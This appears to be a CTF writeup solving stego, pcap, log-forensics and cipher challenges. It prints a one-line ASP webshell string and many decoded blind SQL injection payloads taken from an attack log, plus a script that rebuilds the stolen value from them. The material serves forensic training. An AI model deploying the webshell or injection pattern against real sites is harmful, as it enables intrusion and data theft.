Since I didn't take part in the competition, I couldn't work on the WEB challenges.
Open the web page.
Analyze the image with binwalk.
binwalk shows a zip file appended to the image. The extracted text file is so large that even Notepad++ struggles with it; by eye it is Base64, so decode it with a script and write the result to disk (it turns out to be Base64 inside Base64, hence the two decode calls):
import base64

# secret.txt is the text pulled out of the zip; it is Base64 wrapped in Base64,
# so decode twice before writing the raw bytes out as the PNG.
with open("secret.txt", "r") as fp:
    secret = fp.read()

s1 = base64.b64decode(secret)   # first layer
s1 = base64.b64decode(s1)       # second layer -> raw PNG bytes

with open("secret.png", "wb") as fp1:
    fp1.write(s1)

print("[+] Png write success")
Well, the young lady is quite pretty.
This one is a recycled challenge.
<%execute request("images")%> is the classic one-line ASP webshell (it executes whatever is sent in the "images" request parameter); compute the SHA1 hash of that string and submit it.
Pretty dull.
Open the capture in Wireshark and follow the TCP streams; one of them is an upload of a compressed file, so export the uploaded data:
Opening content.xml shows that there is another compressed file inside it:
Export that data as well; it is a compiled Python file (pyc):
Decompiling the pyc gives the following source:
# File: F (Python 2.7)
from sys import exit

def gold_room():
    print 'This room is full of gold. How much do you take?'
    next = raw_input('> ')
    if '0' in next or '1' in next:
        how_much = int(next)
    else:
        dead('Man, learn to type a number.')
    if how_much < 50:
        print 'You win VGVsbCB5b3UgYXJndj1mbGFn!'
        exit(0)
    else:
        dead('You greedy bastard!')

def bear_room():
    print 'There is a bear here.'
    print 'The bear has a bunch of honey.'
    print 'The fat bear is in front of another door.'
    print 'How are you going to move the bear?'
    bear_moved = False
    while True:
        next = raw_input('> ')
        if next == 'take honey':
            dead('The bear looks at you then slaps your face off.')
            continue
        if next == 'taunt bear' and not bear_moved:
            print 'The bear has moved from the door. You can go through it now.'
            bear_moved = True
            continue
        if next == 'taunt bear' and bear_moved:
            dead('The bear gets pissed off and chews your leg off.')
            continue
        if next == 'open door' and bear_moved:
            gold_room()
            continue
        print 'I got no idea what that means.'

def cthulhu_room():
    print 'Here you see the great evil Cthulhu.'
    print 'He, it, whatever stares at you and you go insane.'
    print 'Do you flee for your life or eat your head?'
    next = raw_input('> ')
    if 'flee' in next:
        start()
    elif 'head' in next:
        dead('Well that was tasty!')
    else:
        cthulhu_room()

def dead(why):
    print why, 'Good job!'
    exit(0)

def start():
    print 'You are in a dark room.'
    print 'There is a door to your right and left.'
    print 'Which one do you take?'
    next = raw_input('> ')
    if next == 'left':
        bear_room()
    elif next == 'right':
        cthulhu_room()
    else:
        dead('You stumble around the room until you starve.')

start()
The line print 'You win VGVsbCB5b3UgYXJndj1mbGFn!' stands out; Base64-decoding the second half of the string gives 'Tell you argv=flag', which is a hint.
I was stuck here for a long time. After talking it over with a few other experienced players, the advice was to open the file in a hex editor, search for the keyword argv, and use the string that follows it:
Later the challenge author came out and said it is a monoalphabetic substitution cipher, so the answer is probably
For now I'll take the flag to be 'flag is How dogs is'.
So the author is in a relationship and taking a dig at us single dogs?
Opening the file in Notepad++ shows that it is a web access log (W3C extended format: lines beginning with # are directives, the rest are one request per line).
It is large and mostly noise, so I wrote a Python script that keeps only the request field of each line (the resource with its query string, which on failed requests also carries the error information) and URL-decodes it:
# coding: utf8
from urllib.parse import unquote

# Keep only the request field of each log line, URL-decoded, so the injected
# SQL is readable. Lines starting with '#' are W3C log directives (#Fields: ...)
# and are skipped. Field index 6 is where the request/query sits in this log's
# field layout; check the #Fields: header if the layout differs.
with open("data.log", "r") as fp, open("data_se.log", "w") as fp1:
    for i in fp:
        # skip directive/comment lines
        if i.startswith("#"):
            continue
        # split on spaces and take the request field
        reqs = i.split(" ")
        if len(reqs) <= 6:
            continue
        decode_s = unquote(reqs[6])
        print("[*]", decode_s)
        fp1.write(decode_s + "\n")
print("[+] write ok")
Since the question is what the attacker stole, it is enough to find what was dumped from the final target table, so work backwards from the end of the log and look for an obvious table or column name.
It is clear that the attacker dumped the theflag column of the tourdata.dbo.news table.
Focus on the log lines that reference theflag:
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),1,1))>64|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),1,1))>32
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),1,1))>48
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),1,1))>56|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),1,1))>52
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),1,1))>54|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),1,1))>53|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),2,1))>64|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),2,1))>32
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),2,1))>48
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),2,1))>56|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),2,1))>52|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),2,1))>50|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),2,1))>49
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),3,1))>64
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),3,1))>96
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),3,1))>112|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),3,1))>104|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),3,1))>100|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),3,1))>98
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),3,1))>99|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),4,1))>64|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),4,1))>32
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),4,1))>48
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),4,1))>56|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),4,1))>52
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),4,1))>54|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),4,1))>53
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),5,1))>64
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),5,1))>96
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),5,1))>112|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),5,1))>104|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),5,1))>100
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),5,1))>102|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),5,1))>101
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),6,1))>64|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),6,1))>32
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),6,1))>48
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),6,1))>56|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),6,1))>52|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),6,1))>50|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),6,1))>49|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),7,1))>64
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),7,1))>96
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),7,1))>112|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),7,1))>104|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),7,1))>100|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),7,1))>98
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),7,1))>99
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),8,1))>64|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),8,1))>32
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),8,1))>48
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),8,1))>56|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),8,1))>52
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),8,1))>54|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),8,1))>53
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),33,1))>64|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),33,1))>32|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),33,1))>16|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),33,1))>8|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),33,1))>4|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),33,1))>2|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),33,1))>1|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
The filtering rule: when the injected condition is true the page renders normally; when it is false the query returns no row and the log records ADO error 800a0bcd (the Chinese tail on those lines reads "Either BOF or EOF is True, or the current record has been deleted; the requested operation requires a current record"). Each position is narrowed by binary search: the largest threshold that held and the smallest that failed bound the character code, and the character is fixed once they are one apart.
Reading the eight positions shown above that way gives 53,50,99,54,102,49,100,54 (position 2 resolves to '2': '>49' holds and '>50' fails). The probes at position 33 all fail, down to '>1', which means the value is shorter than 33 characters.
Decoding gives: 52c6f1d6
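The per-character binary search above can be automated rather than read by hand. The script below is an added example, not part of the original writeup: it parses probe lines of the form shown above, treats the 800a0bcd tail as "condition false", tightens a lower and an upper bound per position, and emits the character once the bounds meet. The sample lines are constructed from the page's probe pattern with the outcomes for positions 1 to 3 and 33 copied from the log above (the ADO message is given in English). It also recognises the end-of-string case the hand analysis needs for position 33: every probe failing down to "> 1".

```python
import re

# Constructed sample: the probe pattern is copied from the decoded log above,
# and the (position, threshold, errored) triples are read off the log lines for
# positions 1-3 plus the position-33 probes. Nothing else is real data.
SUBQUERY = ("(SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) "
            "FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32))")
ADO_ERROR = ("|18|800a0bcd|Either BOF or EOF is True, or the current record "
             "has been deleted. Requested operation requires a current record.")
PROBES = [
    (1, 64, True), (1, 32, False), (1, 48, False), (1, 56, True),
    (1, 52, False), (1, 54, True), (1, 53, True),
    (2, 64, True), (2, 32, False), (2, 48, False), (2, 56, True),
    (2, 52, True), (2, 50, True), (2, 49, False),
    (3, 64, False), (3, 96, False), (3, 112, True), (3, 104, True),
    (3, 100, True), (3, 98, False), (3, 99, True),
    (33, 64, True), (33, 32, True), (33, 16, True), (33, 8, True),
    (33, 4, True), (33, 2, True), (33, 1, True),
]
SAMPLE_LOG = [
    "id=2 AND UNICODE(SUBSTRING(%s,%d,1))>%d%s" % (SUBQUERY, pos, thr, ADO_ERROR if err else "")
    for pos, thr, err in PROBES
]

# position and threshold of one "UNICODE(SUBSTRING(...,pos,1))>thr" probe
PROBE_RE = re.compile(r"SUBSTRING\(.*?\),(\d+),1\)\)>(\d+)")
ERROR_CODE = "800a0bcd"   # ADO "BOF or EOF" error: the query returned no row


def parse_probe(line):
    """Return (position, threshold, condition_held) or None for non-probe lines.

    The condition held exactly when the page did NOT error: a false AND clause
    returns no row, and reading a field from an empty recordset raises 800a0bcd.
    """
    m = PROBE_RE.search(line)
    if not m:
        return None
    return int(m.group(1)), int(m.group(2)), ERROR_CODE not in line


def reconstruct(lines):
    """Rebuild the exfiltrated string from the outcome of every probe.

    For each position keep the tightest bounds seen:
      lo = largest t for which "code > t" held   ->  code >= lo + 1
      hi = smallest t for which it failed        ->  code <= hi
    The character is known once hi == lo + 1. Returns (text, unresolved) where
    unresolved maps still-ambiguous positions to their (lo, hi) bounds.
    """
    lo, hi = {}, {}
    for line in lines:
        probe = parse_probe(line)
        if probe is None:
            continue
        pos, thr, held = probe
        if held:
            lo[pos] = max(lo.get(pos, 0), thr)
        else:
            hi[pos] = min(hi.get(pos, 0xFFFF), thr)

    text, unresolved = [], {}
    for pos in sorted(set(lo) | set(hi)):
        low, high = lo.get(pos, 0), hi.get(pos)
        # Every probe failed, down to "> 1": SUBSTRING past the end yields ''
        # and UNICODE('') is NULL, so no comparison can hold. The string ended.
        if pos not in lo and high is not None and high <= 1:
            break
        if high == low + 1:
            text.append(chr(high))
        else:
            unresolved[pos] = (low, high)
            text.append("?")
    return "".join(text), unresolved


if __name__ == "__main__":
    value, todo = reconstruct(SAMPLE_LOG)
    print("recovered:", value, "unresolved:", todo)
```

Feed it the output of the URL-decoding filter above and the full dump falls out; any position that prints as "?" is one where the attacker's search never closed the gap, with the surviving bounds reported so it can be checked by hand.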
MZWGCZ33MM4GENJVHBRDSNJUGAYTSOBVGZTDAYRQGIZTINLEMMZTSNJVHBRX2===
Obvious Base32 characteristics: only uppercase letters and digits, with '=' padding.
Base32-decoding it directly gives the flag: flag{c8b558b954019856f0b02345dc39558c}
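The stego challenge at the top (Base64 wrapped in Base64 around a PNG) and this one (a bare Base32 string) are the same task: strip encoding layers until recognisable data appears. The following is an added example, not code from the writeup, that generalises the two-decode script from the first challenge: it picks Base32 or Base64 by alphabet, peels layers until a known file signature shows up or the data stops decoding, and reports how many layers came off. The fake PNG payload and the magic-number table are constructed for the example; the Base32 string is the one from this challenge.

```python
import base64
import binascii
import re

# File signatures to stop at once the real payload is exposed (constructed list).
MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpeg",
    b"PK\x03\x04": "zip",
    b"GIF8": "gif",
    b"%PDF": "pdf",
}
# Alphabet checks: Base32 is A-Z and 2-7 with up to six '=', Base64 is
# A-Za-z0-9+/ with up to two '='. A Base32 string also passes the Base64
# check, so Base32 is tried first whenever its stricter alphabet matches.
B32_RE = re.compile(rb"^[A-Z2-7]+={0,6}$")
B64_RE = re.compile(rb"^[A-Za-z0-9+/]+={0,2}$")


def sniff(data):
    """Name the file type from its leading bytes, or None if unknown."""
    for magic, name in MAGIC.items():
        if data.startswith(magic):
            return name
    return None


def decode_layer(data):
    """Decode one Base32 or Base64 layer, or return None if data is neither."""
    s = b"".join(data.split())          # drop the line breaks dumps tend to have
    if B32_RE.match(s):
        try:
            return base64.b32decode(s)
        except binascii.Error:
            pass                        # e.g. length not a multiple of 8
    if B64_RE.match(s):
        try:
            return base64.b64decode(s, validate=True)
        except binascii.Error:
            pass
    return None


def peel(data, max_layers=8):
    """Strip nested encoding layers until a known signature (or undecodable
    data) appears. Returns (bytes, layers_removed, detected_type_or_None)."""
    layers = 0
    while layers < max_layers:
        if sniff(data):
            break
        decoded = decode_layer(data)
        if not decoded:
            break
        data, layers = decoded, layers + 1
    return data, layers, sniff(data)


# Constructed inputs: a fake PNG wrapped in Base64 twice, as in the stego
# challenge, and the Base32 string from the log challenge above.
PNG_TWICE = base64.b64encode(base64.b64encode(b"\x89PNG\r\n\x1a\n" + b"\x00" * 16))
FLAG_B32 = b"MZWGCZ33MM4GENJVHBRDSNJUGAYTSOBVGZTDAYRQGIZTINLEMMZTSNJVHBRX2==="

if __name__ == "__main__":
    for blob in (PNG_TWICE, FLAG_B32):
        out, n, kind = peel(blob)
        print(n, "layer(s) removed, type:", kind, "->", out[:40])
```

The max_layers cap matters on real dumps: a blob that happens to stay inside the Base64 alphabet after decoding would otherwise be peeled forever into garbage, and the type report tells you whether the loop stopped on a signature or merely on undecodable bytes.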
snkeegt fhstetr Iedsabs tnaktrt otessha iiriwis tethees
key: howarey
Columnar Transposition Cipher
Well, I like it simple and direct: it tells you outright that this is a columnar transposition cipher; the specific rule is as follows:
So the flag: Itisofteninthedarkestskiesthatweseebrighteststars (the seven ciphertext groups are the columns, placed in the order given by sorting the key letters of howarey; reading the grid row by row gives "It is often in the darkest skies that we see brightest stars").
